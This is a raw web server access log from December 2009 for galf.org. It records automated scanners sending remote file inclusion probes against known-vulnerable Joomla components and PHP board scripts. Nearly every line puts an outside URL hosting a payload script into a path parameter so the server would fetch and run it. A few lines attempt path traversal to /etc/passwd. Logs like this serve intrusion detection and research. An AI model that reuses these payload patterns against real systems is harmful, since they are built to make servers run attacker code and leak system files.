211.232.85.247 - - [27/Dec/2009:19:11:11 -0800] "GET /saveserver.php?thisdir=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [27/Dec/2009:19:11:11 -0800] "GET /logs/access_090824.log/saveserver.php?thisdir=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [27/Dec/2009:19:11:11 -0800] "GET /logs/saveserver.php?thisdir=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:19:11:50 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:19:11:50 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:19:11:50 -0800] "GET /logs/access_090921.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [27/Dec/2009:19:15:12 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [27/Dec/2009:19:15:16 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [27/Dec/2009:19:15:29 -0800] "GET /logs/access_091123.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [27/Dec/2009:19:15:29 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [27/Dec/2009:19:15:29 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [27/Dec/2009:19:15:46 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://www.tsv-gersthofen.de/osirys.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
211.230.148.68 - - [27/Dec/2009:19:16:13 -0800] "GET /logs/access_090914.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [27/Dec/2009:19:16:13 -0800] "GET /logs/access_090629.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [27/Dec/2009:19:16:13 -0800] "GET /logs/access_090928.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [27/Dec/2009:19:16:13 -0800] "GET /logs/access_091026.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:16:56 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:16:56 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:16:56 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:23 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:23 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:23 -0800] "GET /logs/access_091221.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [27/Dec/2009:19:17:29 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [27/Dec/2009:19:17:30 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:30 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:30 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:30 -0800] "GET /logs/access_091221.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:33 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:33 -0800] "GET /logs/access_091221.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:33 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:35 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:35 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:17:35 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:18:15 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:18:15 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:18:15 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.62.136.226 - - [27/Dec/2009:19:18:26 -0800] "GET /logs/access_090601.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.62.136.226 - - [27/Dec/2009:19:18:26 -0800] "GET /logs/access_090601.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [27/Dec/2009:19:19:20 -0800] "GET /logs/access_090928.log/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
84.19.168.8 - - [27/Dec/2009:19:19:21 -0800] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
84.19.168.8 - - [27/Dec/2009:19:19:21 -0800] "GET /logs/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.175.13 - - [27/Dec/2009:19:19:27 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [27/Dec/2009:19:19:31 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [27/Dec/2009:19:20:03 -0800] "GET /logs/access.log/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
84.19.168.8 - - [27/Dec/2009:19:20:03 -0800] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
84.19.168.8 - - [27/Dec/2009:19:20:04 -0800] "GET /logs/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
208.43.211.154 - - [27/Dec/2009:19:23:57 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.43.211.154 - - [27/Dec/2009:19:24:07 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:24:14 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:24:15 -0800] "GET /?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
80.67.28.145 - - [27/Dec/2009:19:24:17 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
80.67.28.145 - - [27/Dec/2009:19:24:17 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
80.67.28.145 - - [27/Dec/2009:19:24:17 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [27/Dec/2009:19:24:25 -0800] "GET /logs/access_091123.log%20%20//?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:24:30 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [27/Dec/2009:19:27:33 -0800] "GET /logs/access_091221.log/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
84.19.168.8 - - [27/Dec/2009:19:27:33 -0800] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
84.19.168.8 - - [27/Dec/2009:19:27:34 -0800] "GET /logs/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:49 -0800] "GET /index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:49 -0800] "GET /logs/access_091102.log%20%20//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:49 -0800] "GET /logs//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:55 -0800] "GET /index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:55 -0800] "GET /logs/access_091102.log%20%20//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:55 -0800] "GET /logs//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:58 -0800] "GET /index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:58 -0800] "GET /logs//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:28:58 -0800] "GET /logs/access_091102.log%20%20//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.11.58 - - [27/Dec/2009:19:30:26 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dds.co.kr/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.11.58 - - [27/Dec/2009:19:30:26 -0800] "GET /logs/access_090831.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dds.co.kr/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.11.58 - - [27/Dec/2009:19:30:26 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dds.co.kr/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.11.58 - - [27/Dec/2009:19:30:49 -0800] "GET /logs/access_090831.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dds.co.kr/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.145 - - [27/Dec/2009:19:31:07 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.207.72 - - [27/Dec/2009:19:31:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:53 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:53 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:53 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:54 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:54 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:54 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:57 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:57 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:58 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:58 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:31:58 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:33:02 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:33:02 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:33:02 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:33:02 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:33:02 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:33:02 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.11.58 - - [27/Dec/2009:19:33:53 -0800] "GET /logs/access_090928.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dds.co.kr/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.11.58 - - [27/Dec/2009:19:33:53 -0800] "GET /logs/access_090921.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dds.co.kr/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:35:03 -0800] "GET /logs/access_090713.log%20%20//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.113.195.12 - - [27/Dec/2009:19:35:17 -0800] "GET /errors.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.113.195.12 - - [27/Dec/2009:19:35:17 -0800] "GET /logs/errors.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:35:44 -0800] "GET /?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:35:44 -0800] "GET /logs/access_091123.log%20%20//?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:35:44 -0800] "GET /logs//?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:35:44 -0800] "GET /logs/access_090713.log%20%20//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:35:54 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [27/Dec/2009:19:36:08 -0800] "GET /logs/access_090713.log%20%20//index.php/?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:36:11 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:36:11 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:36:11 -0800] "GET /logs/access_091221.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:36:11 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:36:11 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:36:11 -0800] "GET /logs/access_091221.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:38:12 -0800] "GET /logs/access_091123.log%20%20//?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:38:12 -0800] "GET /?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:38:12 -0800] "GET /logs//?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
174.133.72.194 - - [27/Dec/2009:19:38:24 -0800] "GET /logs/errors.php?id=http://www.uksoccershop.com/images/news/images_med/spread.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
174.133.72.194 - - [27/Dec/2009:19:38:24 -0800] "GET /logs/errors.php?id=http://www.uksoccershop.com/images/news/images_med/id2.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
174.133.72.194 - - [27/Dec/2009:19:38:24 -0800] "GET /errors.php?id=http://www.uksoccershop.com/images/news/images_med/spread.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
174.133.72.194 - - [27/Dec/2009:19:38:24 -0800] "GET /errors.php?id=http://www.uksoccershop.com/images/news/images_med/id2.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:38:31 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:39:25 -0800] "GET /?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
